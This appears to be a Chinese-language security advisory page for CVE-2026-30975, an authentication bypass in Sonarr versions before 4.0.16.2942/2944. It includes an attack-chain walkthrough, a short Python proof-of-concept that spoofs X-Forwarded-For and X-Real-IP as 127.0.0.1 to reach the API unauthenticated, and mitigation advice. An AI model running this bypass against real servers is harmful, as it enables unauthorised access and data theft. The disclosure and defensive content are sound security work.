CVE-2026-30975 CVSS 8.1 高危

CVE-2026-30975 Sonarr认证绕过漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30975

漏洞类型

认证绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sonarr

漏洞概述

Sonarr在特定配置下存在认证绕过漏洞。当用户禁用了本地地址的认证要求且未部署正确配置的反向代理时，攻击者可利用该缺陷绕过身份验证。该漏洞影响4.0.16.2942之前的版本，可能导致敏感数据泄露及系统完整性受损。

技术细节

该漏洞的核心在于Sonarr对客户端IP地址的验证机制存在缺陷。当系统配置为对本地地址禁用认证时，攻击者可以通过构造特制的HTTP请求包，在其中插入伪造的IP地址Header（例如将X-Forwarded-For或X-Real-IP设置为127.0.0.1）。如果Sonarr直接暴露在互联网上，或者其前端的反向代理未正确配置以剥离这些不可信的Header，Sonarr后端就会错误地将远程请求识别为来自受信任的本地网络。这种逻辑漏洞使得攻击者能够在不提供有效凭据的情况下，绕过身份验证层，直接访问管理接口和API，进而获取敏感信息或篡改系统数据。

攻击链分析

STEP 1

信息收集

攻击者扫描互联网，寻找直接暴露在公网且运行Sonarr服务的目标。

STEP 2

漏洞探测

攻击者向目标发送请求，观察响应特征，判断目标是否配置了“Disabled for Local Addresses”的认证模式。

STEP 3

构造攻击载荷

攻击者构造包含伪造本地IP地址（如127.0.0.1）的HTTP Header（如X-Forwarded-For）的恶意请求包。

STEP 4

执行攻击

发送恶意请求包至Sonarr服务器。由于服务器信任伪造的Header，误认为请求来自本地，从而绕过认证检查。

STEP 5

获取权限与数据窃取

成功访问受保护的API端点，读取敏感配置信息或进行未授权的操作，影响系统机密性和完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-30975: Sonarr Authentication Bypass
# Exploit condition: Auth set to 'Disabled for Local Addresses' without a proper reverse proxy.
# This script sends a request with a spoofed local IP header to bypass auth.

target_url = "http://<TARGET_IP>:<PORT>/api/v3/system/status"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    # Spoofing the source IP to appear as localhost
    "X-Forwarded-For": "127.0.0.1",
    "X-Real-IP": "127.0.0.1"
}

try:
    response = requests.get(target_url, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Authentication Bypass Successful!")
        print("[+] Response Body:")
        print(response.text)
    else:
        print(f"[-] Failed to bypass. Status Code: {response.status_code}")
        print("[-] Ensure the target is configured with 'Disabled for Local Addresses' and has no reverse proxy.")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Connection Error: {e}")

影响范围

Sonarr < 4.0.16.2942 (Nightly/Develop)

Sonarr < 4.0.16.2944 (Stable/Main)

防御指南

临时缓解措施

建议立即将Sonarr的“Authentication Required”设置为“Enabled”，不要禁用本地地址认证。同时，确保Sonarr运行在配置正确的反向代理之后，该代理应移除不可信的X-Forwarded-For等Header，或者通过VPN、Tailscale等内网隧道访问，避免直接暴露于公网。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表